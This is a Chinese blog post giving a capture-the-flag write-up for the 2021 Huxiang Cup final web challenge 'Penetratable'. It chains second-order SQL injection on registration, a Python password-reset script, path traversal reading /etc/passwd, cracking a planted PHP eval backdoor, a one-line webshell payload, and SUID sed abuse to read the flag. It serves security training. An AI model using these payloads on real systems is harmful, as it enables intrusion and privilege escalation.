<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>[湖湘杯 2021 final]Penetratable | workwork</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[湖湘杯 2021 final]Penetratable</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2025-03-19T12:59:01.000Z" id="date"> 2025-03-19</time></div></span><br><span>Last Update: <div class="control"><time datetime="2025-03-19T13:16:41.277Z" id="updated"> 2025-03-19</time></div></span></div></div><hr><div id="post-content"><p> 见登录，爆密码，没成功，看见有注册，用admin”#注册改密码顶掉admin，成功登录，接着不明所以，扫目录，发现一大堆空白的php，逐一翻找，发现了req.js</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">function login()&#123;<br>    let name=encodeURIComponent(Base64.encode($(&quot;.form-floating&gt;input&quot;).eq(0).val()))<br>    let pass=hex_md5($(&quot;.form-floating&gt;input&quot;).eq(1).val())<br>    $.ajax(&#123;<br>        url: &#x27;/?c=app&amp;m=login&#x27;,<br>        type: &#x27;post&#x27;,<br>        data: &#x27;name=&#x27; + name+&#x27;&amp;pass=&#x27; + pass,<br>        // async:true,<br>        dataType: &#x27;text&#x27;,<br>        success: function(data)&#123;<br>            let res=$.parseJSON(data);<br>            if (res[&#x27;login&#x27;])&#123;<br>                switch (res[&#x27;type&#x27;])&#123;<br>                    case &#x27;user&#x27;: location.href=&quot;/?c=user&quot;; break;<br>                    case &#x27;admin&#x27;: location.href=&quot;/?c=admin&quot;; break;<br>                    case &#x27;root&#x27;: location.href=&quot;/?c=root&quot;; break;<br>                &#125;<br>            &#125;else if(res[&#x27;alertFlag&#x27;])&#123;<br>                alert(res[&#x27;alertData&#x27;]);<br>            &#125;<br>        &#125;<br>    &#125;);<br>&#125;<br><br>function userUpdateInfo()&#123;<br>    let name=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(0).val()))<br>    let oldPass=$(&quot;.input-group&gt;input&quot;).eq(1).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(1).val()):&#x27;&#x27;;<br>    let newPass=$(&quot;.input-group&gt;input&quot;).eq(2).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(2).val()):&#x27;&#x27;;<br>    let saying=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(3).val()))<br>    $.ajax(&#123;<br>        url: &#x27;/?c=user&amp;m=updateUserInfo&#x27;,<br>        type: &#x27;post&#x27;,<br>        data: &#x27;name=&#x27;+name+&#x27;&amp;newPass=&#x27;+newPass+&#x27;&amp;oldPass=&#x27;+oldPass+&#x27;&amp;saying=&#x27;+saying,<br>        // async:true,<br>        dataType: &#x27;text&#x27;,<br>        success: function(data)&#123;<br>            alertHandle(data);<br>        &#125;<br>    &#125;);<br>&#125;<br><br>function signOut()&#123;<br>    $.ajax(&#123;<br>        url: &#x27;/?c=app&amp;m=signOut&#x27;,<br>        type: &#x27;get&#x27;,<br>        dataType: &#x27;text&#x27;,<br>        success: function(data)&#123;<br>            alertHandle(data);<br>        &#125;<br>    &#125;);<br>&#125;<br><br>function alertHandle(data)&#123;<br>    let res=$.parseJSON(data);<br>    if(res[&#x27;alertFlag&#x27;])&#123;<br>        alert(res[&#x27;alertData&#x27;]);<br>    &#125;<br>    if(res[&#x27;location&#x27;])&#123;<br>        location.href=res[&#x27;location&#x27;];<br>    &#125;<br>&#125;<br><br>function changeAdminPage(type)&#123;<br>    let page=$(&#x27;.page&#x27;).text();<br>    if (type==&#x27;next&#x27;)&#123;<br>        location.href=&#x27;?c=admin&amp;m=getUserList&amp;page=&#x27;+(parseInt(page)+1);<br>    &#125;<br>    if (type==&#x27;last&#x27;)&#123;<br>        location.href=&#x27;?c=admin&amp;m=getUserList&amp;page=&#x27;+(parseInt(page)-1);<br>    &#125;<br>&#125;<br>function changeRootPage(type)&#123;<br>    let page=$(&#x27;.page&#x27;).text();<br>    if (type==&#x27;next&#x27;)&#123;<br>        location.href=&#x27;?c=root&amp;m=getUserInfo&amp;page=&#x27;+(parseInt(page)+1);<br>    &#125;<br>    if (type==&#x27;last&#x27;)&#123;<br>        location.href=&#x27;?c=root&amp;m=getUserInfo&amp;page=&#x27;+(parseInt(page)-1);<br>    &#125;<br>&#125;<br><br>function updatePass()&#123;<br>    // let name=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(0).val()))<br>    // let oldPass=$(&quot;.input-group&gt;input&quot;).eq(1).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(1).val()):&#x27;&#x27;;<br>    // let newPass=$(&quot;.input-group&gt;input&quot;).eq(2).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(2).val()):&#x27;&#x27;;<br>    // let saying=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(3).val()))<br>    // $.ajax(&#123;<br>    //     url: &#x27;/?c=admin&amp;m=updatePass&#x27;,<br>    //     type: &#x27;post&#x27;,<br>    //     data: &#x27;name=&#x27;+name+&#x27;&amp;newPass=&#x27;+newPass+&#x27;&amp;oldPass=&#x27;+oldPass+&#x27;&amp;saying=&#x27;+saying,<br>    //     // async:true,<br>    //     dataType: &#x27;text&#x27;,<br>    //     success: function(data)&#123;<br>    //         alertHandle(data);<br>    //     &#125;<br>    // &#125;);<br>&#125;<br><br>function adminHome()&#123;<br>    location.href=&#x27;/?c=root&#x27;<br>&#125;<br><br>function getUserInfo()&#123;<br>    location.href=&#x27;/?c=root&amp;m=getUserInfo&#x27;<br>&#125;<br><br>function getLogList()&#123;<br>    location.href=&#x27;/?c=root&amp;m=getLogList&#x27;<br>&#125;<br><br>function downloadLog(filename)&#123;<br>    location.href=&#x27;/?c=root&amp;m=downloadRequestLog&amp;filename=&#x27;+filename;<br>&#125;<br><br>function register()&#123;<br>    let name=encodeURIComponent(Base64.encode($(&quot;.form-floating&gt;input&quot;).eq(2).val()))<br>    let pass=hex_md5($(&quot;.form-floating&gt;input&quot;).eq(3).val())<br>    let saying=encodeURIComponent(Base64.encode($(&quot;.form-floating&gt;input&quot;).eq(4).val()))<br>    $.ajax(&#123;<br>        url: &#x27;/?c=app&amp;m=register&#x27;,<br>        type: &#x27;post&#x27;,<br>        data: &#x27;name=&#x27; + name+&#x27;&amp;pass=&#x27; + pass +&#x27;&amp;saying=&#x27; +saying,<br>        dataType: &#x27;text&#x27;,<br>        success: function(data)&#123;<br>            // console.log(data);<br>            alertHandle(data);<br>        &#125;<br>    &#125;);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>看见有root，用同样的方法顶，没有权限改密码，看别人的wp知道了要发包，用admin用户改root的密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">import base64<br>from hashlib import md5<br>import requests<br>url1=&quot;http://node4.anna.nssctf.cn:28119/?c=app&amp;m=login&quot;<br>name=base64.b64encode(&#x27;admin&#x27;.encode(&#x27;utf-8&#x27;)).decode()<br>password = md5(b&#x27;123&#x27;).hexdigest()<br>pass2=md5(b&#x27;root&#x27;).hexdigest()<br>url2=&quot;http://node4.anna.nssctf.cn:28119/?c=admin&amp;m=updatePass&quot;<br>name2=base64.b64encode(&#x27;root&#x27;.encode(&#x27;utf-8&#x27;)).decode()<br>sess=requests.session()<br>res1=sess.post(url=url1,data=&#123;&quot;name&quot;:name,&quot;pass&quot;:password&#125;);<br>print(res1.text)<br>res2=sess.post(url=url2,data=&#123;&quot;name&quot;:name2,<br>                              &quot;newPass&quot;:pass2,<br>                              &quot;oldPass&quot;:password,<br>                              &quot;saying&quot;:&quot;666&quot;&#125;)<br>print(res2.text)<br></code></pre></td></tr></table></figure>

<p>再次登录，能够下载文件了，看见filename&#x3D;，试了试目录遍历，找到filename&#x3D;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd,以此进入..&#x2F;..&#x2F;..&#x2F;var&#x2F;www&#x2F;html&#x2F;phpinfo.php,得到新线索</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php <br>if(md5(@$_GET[&#x27;pass_31d5df001717&#x27;])===&#x27;3fde6bb0541387e4ebdadf7c2ff31123&#x27;)&#123;@eval($_GET[&#x27;cc&#x27;]);&#125; <br>// hint: Checker will not detect the existence of phpinfo.php, please delete the file when fixing the vulnerability.<br>?&gt;<br></code></pre></td></tr></table></figure>

<p>让ai写了个脚本爆md5，结果是1q2w3e</p>
<p>再来到空白的&#x2F;phpinfo.php，传参，cc可以执行ls &#x2F;但cat不了flag，权限不够，改为写马，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">/phpinfo.php?pass_31d5df001717=1q2w3e&amp;cc=@eval($_POST[1]);<br></code></pre></td></tr></table></figure>

<p>蚁剑链接，suid提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">find / -user root -perm -4000 -print<br></code></pre></td></tr></table></figure>

<p>找到&#x2F;bin&#x2F;sed,于是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">sed -n &#x27;1p&#x27; /flag<br></code></pre></td></tr></table></figure>

<p>sed选项:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">常见的sed命令选项包含以下几种：<br>-e或-expression=：表示用指定命令或者脚本来处理输入的文本文件<br>-f或-file-：表示用指定的脚本文件来处理输入的文件文件<br>-h或–help：显示帮助<br>-n、-quite或silent：表示仅表示处理后的结果<br>-i：直接编辑文本文件<br></code></pre></td></tr></table></figure>

<p>sed操作：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">a：增加，在当前行下面增加一行指定内容。<br>c：替换，讲选定行替换为指定内容。<br>d：删除，删除选定的行。<br>i：插入，在选定行上面插入一行指定内容。<br>p：打印，如果同时指定行，表示打印指定行；如果不指定行，则表示打印所有内容，如果又非打印字符，则以ASCLL码输出。通常与“-n”选项一起使用。<br>s：替换，替换指定字符<br>y：字符转换<br></code></pre></td></tr></table></figure>

<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2025/03/22/light-pink/">← Next light_pink</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2025/03/18/ez-1zpop/">ez_1zpop Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">heyi404</a></h1><div id="description"><p></p></div></div><div id="aside-block"></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>